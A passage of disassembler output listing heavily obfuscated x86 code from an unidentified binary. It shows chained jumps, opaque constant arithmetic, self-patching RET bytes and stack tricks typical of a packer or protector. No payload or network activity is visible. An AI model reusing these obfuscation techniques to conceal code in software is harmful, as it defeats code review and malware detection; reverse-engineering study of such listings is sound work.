; START OF FUNCTION CHUNK FOR sub_44D759
loc_444ACC: ; CODE XREF: sub_44D759:loc_43A16Fj
rol edx, 11h
xor edx, 1CFB27EFh
add edx, ebp
add edx, 0D08346EAh
jmp loc_43DEEA
; END OF FUNCTION CHUNK FOR sub_44D759
; ---------------------------------------------------------------------------
add ecx, esi
jmp sub_43F365
; ---------------------------------------------------------------------------
mov ds:dword_41D15C, eax
lea eax, nullsub_216
mov byte ptr [eax], 0C3h
jmp loc_44F2CE
; ---------------------------------------------------------------------------
loc_444AFD: ; CODE XREF: ut7h7i2x:0043FC47j
mov eax, [esp]
jmp loc_4436D1
; ---------------------------------------------------------------------------
loc_444B05: ; CODE XREF: ut7h7i2x:0044A3FCj
call sub_449406
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_444B0A: ; CODE XREF: sub_43DBEC+1A667j
jmp loc_449661
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FF0
loc_444B0F: ; CODE XREF: sub_449FF0-3973j
jmp loc_45A1E1
; END OF FUNCTION CHUNK FOR sub_449FF0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_420. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_444B15: ; CODE XREF: ut7h7i2x:0044E0FDj
jmp loc_44317B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_444B1A: ; CODE XREF: sub_444EAA+5470j
jmp loc_44E3F0
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
jnb loc_442D77
push ecx
loc_444B26: ; CODE XREF: ut7h7i2x:loc_457728j
jle loc_441233
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_444B2C: ; CODE XREF: sub_4396F5+1AA88j
rol edx, 1Dh
sub edx, 474F606h
add edx, 7D11FA47h
xchg edx, [esp+8+var_8]
jmp loc_44C875
; END OF FUNCTION CHUNK FOR sub_4396F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_444B43: ; CODE XREF: sub_4459EE:loc_43E659j
jz loc_439CF2
loc_444B49: ; CODE XREF: ut7h7i2x:00441CE4j
jmp loc_451C64
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
sbb edi, esi
jmp loc_439CEB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_108. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_194. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_444B57: ; CODE XREF: sub_450231:loc_447A6Dj
call sub_44ED9F
loc_444B5C: ; CODE XREF: ut7h7i2x:loc_457830j
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_4471C1
jmp loc_452F60
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
loc_444B6E: ; DATA XREF: sub_4582C8+1o
mov ebp, esp
push ecx
mov esp, ebp
xchg ecx, [esp]
mov ebp, ecx
pop ecx
jmp loc_44B13E
; ---------------------------------------------------------------------------
loc_444B7E: ; CODE XREF: ut7h7i2x:loc_44032Cj
jnz loc_459B30
jmp loc_454053
; ---------------------------------------------------------------------------
xchg edx, [esi]
jmp loc_44ACC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_444B90: ; CODE XREF: sub_44B01F-ABC6j
mov ds:off_41D0A8, eax
lea eax, sub_44B01F
mov byte ptr [eax], 0C3h
jmp loc_43ABB5
; END OF FUNCTION CHUNK FOR sub_44B01F
; =============== S U B R O U T I N E =======================================
sub_444BA4 proc near ; CODE XREF: sub_41088C+78p
; ut7h7i2x:0043B86Dj
; DATA XREF: ...
; FUNCTION CHUNK AT 00442FE2 SIZE 00000005 BYTES
push offset loc_43B868
jmp loc_442FE2
sub_444BA4 endp
; =============== S U B R O U T I N E =======================================
sub_444BAE proc near ; CODE XREF: ut7h7i2x:0043A18Dp
; sub_452C66+4B17j
; FUNCTION CHUNK AT 0043D0BA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444CC2 SIZE 0000001E BYTES
xchg ebx, [esp+0]
pop ebx
push 567E3DC6h
pop ecx
add ecx, 0F79381A4h
xor ecx, 3DF141A0h
jmp loc_444CC2
sub_444BAE endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_326. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A20D
loc_444BCA: ; CODE XREF: sub_45A20D-3342j
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_45A20D
; ---------------------------------------------------------------------------
loc_444BCF: ; CODE XREF: ut7h7i2x:00447444j
jg loc_459752
mov eax, 0E454E2A0h
; START OF FUNCTION CHUNK FOR sub_4506D3
loc_444BDA: ; CODE XREF: sub_4506D3:loc_456189j
add ebx, 0CBFDFFDAh
xchg ebx, [esp+0]
jmp nullsub_563
; END OF FUNCTION CHUNK FOR sub_4506D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_444BE8: ; CODE XREF: sub_4589E0:loc_4589EFj
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43D86D
jmp loc_443ADF
; END OF FUNCTION CHUNK FOR sub_4589E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_444BFA: ; CODE XREF: sub_43CCC3+1DEj
; sub_45A070:loc_458B71j
jnz loc_43F3B4
loc_444C00: ; CODE XREF: sub_43CCC3:loc_44AFBBj
or eax, 484A4CBh
add eax, 0F37EFE55h
xchg eax, [esp+114h+var_114]
loc_444C0F: ; CODE XREF: sub_445056:loc_439568j
jmp loc_44B499
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
xor ebp, 0F13D822Fh
jmp sub_43DB54
; ---------------------------------------------------------------------------
cdq
mov [ebx], ecx
jmp sub_4447C9
; ---------------------------------------------------------------------------
push 902B0320h
pop edx
xor edx, 0F3658ED7h
rol edx, 11h
add edx, 70C37C3Dh
jmp loc_4556BB
; =============== S U B R O U T I N E =======================================
sub_444C41 proc near ; CODE XREF: sub_457A66-62C5p
; ut7h7i2x:0045725Fj
; FUNCTION CHUNK AT 0044A131 SIZE 0000000D BYTES
xchg edi, [esp+0]
pop edi
mov edx, eax
call sub_43F058
pop edx
pop eax
jmp loc_44A131
sub_444C41 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_444C53 proc near ; CODE XREF: ut7h7i2x:00445BECj
; sub_452A50p
xchg ebx, [esp+0]
pop ebx
push edi
mov edi, ebp
jmp loc_4490BC
sub_444C53 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CD2
loc_444C5F: ; CODE XREF: sub_458CD2-8F2j
popf
mov ebp, 29EC6C13h
loc_444C65: ; CODE XREF: ut7h7i2x:loc_44E31Bj
mov eax, [ebp-0Ch]
push eax
call sub_43D797
jmp loc_457D71
; END OF FUNCTION CHUNK FOR sub_458CD2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_189. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xor ecx, ebx
jmp loc_45549C
; ---------------------------------------------------------------------------
loc_444C7B: ; DATA XREF: ut7h7i2x:0043AA17o
push 2C737C8Bh
pop eax
or eax, 775E6A86h
test eax, 1000000h
jmp loc_439EDB
; ---------------------------------------------------------------------------
or eax, eax
jnz loc_4557FC
jmp loc_44B957
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_444C9F: ; CODE XREF: sub_44F43B:loc_44A676j
jnz loc_44F2D3
jmp loc_447544
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_444CAA: ; CODE XREF: sub_43B847+8F1Aj
; sub_43B847:loc_452264j
push edi
push 0D70CCDF1h
pop edi
or edi, 97BA0414h
cmp edi, 0E79B284Ah
jmp loc_447498
; END OF FUNCTION CHUNK FOR sub_43B847
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444BAE
loc_444CC2: ; CODE XREF: sub_444BAE+16j
jnz loc_43D0BA
push edi
push 0D0EA8794h
pop edi
xor edi, 0CAEB9580h
test edi, 2
jmp loc_45196C
; END OF FUNCTION CHUNK FOR sub_444BAE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_444CE0: ; CODE XREF: sub_44865D:loc_44728Bj
pushf
push 50AF7F12h
pop eax
and eax, 540F9C5Fh
xor eax, 0D2123388h
and eax, 0A36F6178h
cmp eax, 0EEE20E5Ch
jmp loc_440469
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
loc_444D04: ; CODE XREF: ut7h7i2x:0045A221j
jnb loc_44607F
sub ecx, 0FDC119D8h
xor ebx, 0F1D3ABADh
loc_444D16: ; CODE XREF: ut7h7i2x:loc_4440A0j
call nullsub_508
jmp locret_4455A5
; ---------------------------------------------------------------------------
loc_444D20: ; CODE XREF: ut7h7i2x:0043DB6Bj
jbe loc_44F81F
; =============== S U B R O U T I N E =======================================
sub_444D26 proc near ; CODE XREF: sub_453A91:loc_439768p
; FUNCTION CHUNK AT 0043A265 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043D18E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004400EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453BF0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457EEA SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push ebx
push 0B190B3E5h
pop ebx
jmp loc_4400EE
sub_444D26 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_444D36: ; CODE XREF: sub_457A66-14944j
pop edi
sub edi, 20DBA797h
and edi, 0BAE8F0Fh
rol edi, 16h
and edi, 65C3214h
add edi, 0FE443574h
mov [edi], eax
jmp loc_43AE8B
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_444D59: ; CODE XREF: sub_459E54:loc_458EF4j
call eax
push edx
push 0EC69C582h
xchg esi, [esp+0]
mov edx, esi
pop esi
sub edx, 5160A5C0h
add edx, 0A4667D8Bh
jmp loc_43B8F3
; END OF FUNCTION CHUNK FOR sub_459E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F943
loc_444D78: ; CODE XREF: sub_44F943-E985j
or eax, ebp
jmp loc_44F69D
; END OF FUNCTION CHUNK FOR sub_44F943
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4551D3
loc_444D7F: ; CODE XREF: sub_4551D3:loc_43BDA8j
mov [edx], eax
pop edx
xor eax, eax
mov [ebp-4], eax
jmp loc_4481EC
; END OF FUNCTION CHUNK FOR sub_4551D3
; ---------------------------------------------------------------------------
loc_444D8C: ; CODE XREF: ut7h7i2x:004404AFj
js loc_45965D
mov ebx, 0DB86379Fh
loc_444D97: ; CODE XREF: ut7h7i2x:loc_4404A6j
xor edx, 6996DD58h
add edx, ebp
add edx, 0B66902ACh
jmp loc_44A759
; =============== S U B R O U T I N E =======================================
sub_444DAA proc near ; CODE XREF: sub_44996Cj
; DATA XREF: sub_457A66:loc_449962o
add eax, 0B0AA838Dh
popf
push edx
mov edx, eax
xchg edx, [esp+0]
sub_444DAA endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_444DB7: ; CODE XREF: sub_447EB5-8E7Fj
jmp loc_44F602
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
call sub_4595BE
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_444DC1: ; CODE XREF: sub_443C4A+12D58j
sub edx, edi
xor edx, 5C6493D0h
jmp loc_453DF3
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_444DCE: ; CODE XREF: sub_455807+13j
sub al, 99h
mov edx, [ebp+var_4]
imul byte ptr [edx]
jmp loc_43CC13
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_444DDA: ; CODE XREF: sub_43BE93:loc_454319j
xchg edi, [esp+4+var_4]
mov ecx, edi
pop edi
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_43BE93
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445346
loc_444DE4: ; CODE XREF: sub_445346+7j
jmp sub_446B90
; END OF FUNCTION CHUNK FOR sub_445346
; =============== S U B R O U T I N E =======================================
sub_444DE9 proc near ; CODE XREF: sub_455807:loc_4406C4j
; ut7h7i2x:0045375Fp ...
; FUNCTION CHUNK AT 0044ABBD SIZE 00000015 BYTES
push ebp
jmp loc_44ABBD
sub_444DE9 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_115. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AFFD
loc_444DF0: ; CODE XREF: sub_44AFFD+3j
jmp loc_43EFB4
; END OF FUNCTION CHUNK FOR sub_44AFFD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FDF2
loc_444DF5: ; CODE XREF: sub_44FDF2-7F48j
not esi
jg loc_441862
jmp loc_4462FC
; END OF FUNCTION CHUNK FOR sub_44FDF2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_141. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_180. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444E04 proc near ; CODE XREF: sub_439BF8-12Fj
; sub_444AA3:loc_43B3B0j ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00446594 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452827 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453ADD SIZE 00000022 BYTES
push ebp
mov ebp, esp
push ebp
mov ebp, ecx
xchg ebp, [esp+4+var_4]
jmp loc_446594
sub_444E04 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439788
loc_444E12: ; CODE XREF: sub_439788:loc_44DE07j
add eax, 18h
mov [ebp-10h], eax
mov eax, [ebp-10h]
jmp loc_43A7B1
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B8F8
loc_444E20: ; CODE XREF: sub_44B8F8+3j
call sub_43F6E5
loc_444E25: ; CODE XREF: sub_448CED-D958j
jmp loc_458520
; END OF FUNCTION CHUNK FOR sub_44B8F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_444E2A: ; CODE XREF: sub_45292B:loc_44EC3Fj
jz loc_457512
jmp loc_44429A
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
sbb eax, 0F24C35F7h
jmp loc_44AC4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_444E40: ; CODE XREF: sub_453E14-16F4Dj
; sub_453E14-3574j
mov eax, [ebp-20h]
push ecx
push 3BBECBE6h
pop ecx
or ecx, 9C893C70h
sub ecx, 11CA88F4h
jmp loc_451FB5
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B76
loc_444E5B: ; CODE XREF: sub_449B76:loc_44C988j
; sub_449B76+2E21j
or edi, 0BBC638C9h
and edi, 0B0F065A9h
add edi, 4F533B9Bh
mov [edi], eax
pop edi
loc_444E70: ; CODE XREF: sub_44C8F3-85D4j
pushf
push offset loc_44235C
jmp nullsub_90
; END OF FUNCTION CHUNK FOR sub_449B76
; ---------------------------------------------------------------------------
loc_444E7B: ; CODE XREF: ut7h7i2x:00446EB0j
jnz loc_447777
; START OF FUNCTION CHUNK FOR sub_455597
loc_444E81: ; CODE XREF: sub_455597-1B16Ej
jmp loc_43D303
; END OF FUNCTION CHUNK FOR sub_455597
; ---------------------------------------------------------------------------
popf
and esi, ebx
jmp loc_447777
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_444E8E: ; CODE XREF: sub_457A66:loc_44FD31j
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov al, [eax]
jz loc_43B8B5
sub al, 99h
mov edx, [ebp+var_4]
imul byte ptr [edx]
cmp al, 0A4h
jmp loc_43A883
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_444EAA proc near ; DATA XREF: sub_4443DE+F5B5o
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004399EA SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043C018 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D4F9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043E399 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E9A0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043FF9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440B61 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442EE6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444B1A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447795 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004481F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449075 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044A30A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044CFA1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044DA49 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044E3F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450AD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451295 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452E99 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004536A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E45 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456BB0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457F42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004585F3 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00458F27 SIZE 0000000B BYTES
call sub_43AA94
loc_444EAF: ; CODE XREF: ut7h7i2x:00442235j
mov ds:off_41D160, eax
loc_444EB5: ; CODE XREF: ut7h7i2x:00448AC1j
lea eax, loc_4399EA
mov byte ptr [eax], 0C3h
loc_444EBE: ; CODE XREF: sub_44DD39:loc_43CB82j
jmp loc_4536A0
sub_444EAA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push edx
jmp loc_44E10D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_210. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442A4D
loc_444ECA: ; CODE XREF: sub_442A4D:loc_4566D0j
jnz loc_44F9CE
loc_444ED0: ; CODE XREF: ut7h7i2x:0045022Cj
jmp loc_451CB7
; END OF FUNCTION CHUNK FOR sub_442A4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B1E7
loc_444ED5: ; CODE XREF: sub_44B1E7-380Bj
jmp loc_4394B2
; END OF FUNCTION CHUNK FOR sub_44B1E7
; ---------------------------------------------------------------------------
loc_444EDA: ; CODE XREF: ut7h7i2x:004434BEj
jmp loc_44E46A
; ---------------------------------------------------------------------------
pushf
sbb edx, 76CBA50Dh
test ebp, eax
jmp loc_44FAFA
; ---------------------------------------------------------------------------
rol edi, 15h
jns loc_449293
jmp sub_43D2F7
; ---------------------------------------------------------------------------
loc_444EFB: ; CODE XREF: ut7h7i2x:0044CCEDj
mov eax, [eax]
mov ecx, [eax]
add eax, 4
mov ebx, [eax]
; START OF FUNCTION CHUNK FOR sub_444851
loc_444F04: ; CODE XREF: sub_444851:loc_456EAAj
jmp loc_455671
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
loc_444F09: ; CODE XREF: ut7h7i2x:loc_44A236j
pop ecx
or ecx, 0F56EA26Bh
add ecx, 557216h
xchg ecx, [esp]
jmp sub_444E04
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44305D
loc_444F1E: ; CODE XREF: sub_44305D:loc_452042j
and esi, 0B91A0250h
add esi, 4F350C1Fh
xchg esi, [esp+0]
loc_444F2D: ; CODE XREF: ut7h7i2x:0043CD9Dj
jmp loc_452AF8
; END OF FUNCTION CHUNK FOR sub_44305D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457818
loc_444F32: ; CODE XREF: sub_457818+13j
xor eax, 946B4E3Dh
call sub_43AA94
call sub_44F9A1
loc_444F42: ; CODE XREF: ut7h7i2x:00450875j
push ebx
mov ebx, edx
xchg ebx, [esp+4+var_4]
call sub_44A833
push 984F6C9Fh
pop eax
or eax, 4610D2CFh
xor eax, 4D1D6712h
jmp loc_455750
; END OF FUNCTION CHUNK FOR sub_457818
; ---------------------------------------------------------------------------
loc_444F64: ; CODE XREF: ut7h7i2x:004520DFj
shr esi, 14h
push ecx
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_444F68: ; CODE XREF: sub_43EF73:loc_4520CBj
; sub_442B3B+16841j
xor eax, 5FCE181Ch
sub eax, 56C42161h
jmp loc_45415B
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_444F79: ; CODE XREF: sub_440CEC+1021Aj
mov [eax], ecx
jmp loc_43D298
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_444F80: ; CODE XREF: sub_4589E0:loc_43DE03j
jz loc_43D86D
; END OF FUNCTION CHUNK FOR sub_4589E0
; START OF FUNCTION CHUNK FOR sub_43D021
loc_444F86: ; CODE XREF: sub_43D021:loc_43EA28j
jmp loc_456997
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_444F8B: ; CODE XREF: sub_447CBE+4E3Fj
jz loc_458477
loc_444F91: ; CODE XREF: sub_43FF65+135F4j
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
loc_444F96: ; CODE XREF: ut7h7i2x:00451F5Ej
jmp loc_443CEB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_444F9B: ; CODE XREF: sub_447EB5-1260j
; sub_455807:loc_453DF3j
jmp loc_456E2D
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
cdq
jmp loc_458474
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A0CE
loc_444FA7: ; CODE XREF: sub_44A0CE:loc_451CE6j
jmp loc_43F756
; END OF FUNCTION CHUNK FOR sub_44A0CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450DB3
loc_444FAC: ; CODE XREF: sub_450DB3+4j
mov esp, ebp
xchg edi, [esp+0]
mov ebp, edi
pop edi
mov eax, ds:dword_4487FC
jmp loc_43E43A
; END OF FUNCTION CHUNK FOR sub_450DB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_444FBF: ; CODE XREF: sub_44B789:loc_4505BBj
mov ebp, esp
push edx
mov edx, ecx
xchg edx, [esp+8+var_8]
mov esp, ebp
pop ebp
jmp loc_44DDFD
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
mov [ebp-8], eax
push eax
call sub_450176
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_444FD8: ; CODE XREF: sub_44F43B:loc_453D45j
jmp nullsub_178
; END OF FUNCTION CHUNK FOR sub_44F43B
; =============== S U B R O U T I N E =======================================
sub_444FDD proc near ; CODE XREF: ut7h7i2x:00441F0Bj
; ut7h7i2x:004589F4p
; FUNCTION CHUNK AT 00441DA3 SIZE 00000008 BYTES
xchg edx, [esp+0]
pop edx
mov ds:off_41D13C, eax
lea eax, sub_442E16
jmp loc_441DA3
sub_444FDD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_444FF2: ; CODE XREF: ut7h7i2x:00440530j
jnp loc_449DF5
; START OF FUNCTION CHUNK FOR sub_439B67
loc_444FF8: ; CODE XREF: sub_439B67+E61Dj
add eax, 4FECCC8Dh
add eax, ebp
add eax, 0A185A7F8h
loc_445006: ; CODE XREF: ut7h7i2x:loc_44F689j
mov eax, [eax]
push eax
loc_445009: ; CODE XREF: sub_4416C9:loc_43DE63j
push esi
not esi
jmp loc_4553EB
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
loc_445011: ; CODE XREF: ut7h7i2x:0044875Aj
jg loc_452E6F
rol ecx, 17h
mov edx, [ebp+0]
shl ebp, 7
jmp loc_442034
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_445025: ; CODE XREF: sub_449C6F+1j
jz loc_458AF5
mov eax, [esp+8+var_8]
push edx
push edi
mov edi, edx
jmp loc_43D409
; END OF FUNCTION CHUNK FOR sub_449C6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F613
loc_445037: ; CODE XREF: sub_44F613:loc_43933Ej
pop edx
rol edx, 7
test edx, 40000h
jmp loc_43FEEF
; END OF FUNCTION CHUNK FOR sub_44F613
; ---------------------------------------------------------------------------
loc_445046: ; CODE XREF: ut7h7i2x:00447EEFj
xchg ebx, eax
; =============== S U B R O U T I N E =======================================
sub_445048 proc near ; CODE XREF: sub_44F336+1p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B367 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044412A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044A890 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E905 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459F99 SIZE 00000004 BYTES
xchg eax, [esp+0]
pop eax
ror eax, 12h
push ebx
jmp loc_44412A
sub_445048 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_323. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_445056 proc near ; DATA XREF: sub_43D989:loc_45A72Ao
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439568 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043C192 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440D0B SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00449CFC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00449FEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AB68 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D393 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044EBCB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044FB18 SIZE 0000000F BYTES
or eax, eax
jnz loc_44EBCB
jmp loc_43C192
sub_445056 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_445063: ; CODE XREF: sub_44DB48:loc_459120j
rol edi, 8
sub edi, 69F2DDF4h
add edi, 919DD71Ch
and ecx, edi
jmp loc_43C448
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
loc_445079: ; CODE XREF: ut7h7i2x:loc_43BDB8j
sbb eax, ebx
popf
loc_44507C: ; CODE XREF: ut7h7i2x:loc_458A8Bj
jmp loc_43D86D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4424D2
loc_445081: ; CODE XREF: sub_4424D2:loc_43BDADj
pop edx
pop ebp
jmp loc_44AEA8
; END OF FUNCTION CHUNK FOR sub_4424D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4411BF
loc_445088: ; CODE XREF: sub_4411BF:loc_43CF99j
sbb ecx, ebx
rol eax, 7
rol ecx, 11h
and eax, ebx
adc ebx, edx
jmp loc_4552DC
; END OF FUNCTION CHUNK FOR sub_4411BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446785
loc_445099: ; CODE XREF: sub_446785:loc_455312j
mov esp, [esp+arg_4]
; END OF FUNCTION CHUNK FOR sub_446785
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_44509D: ; CODE XREF: sub_44B122:loc_43D9E6j
; sub_44B122-D731j ...
xor eax, eax
loc_44509F: ; CODE XREF: sub_44B122-D729j
; sub_4519D2+7A48j
pop large dword ptr fs:0
pop edx
jmp loc_4528D5
; END OF FUNCTION CHUNK FOR sub_4519D2
; =============== S U B R O U T I N E =======================================
sub_4450AC proc near ; CODE XREF: ut7h7i2x:0043BD8Fp
; ut7h7i2x:0044C0F5j
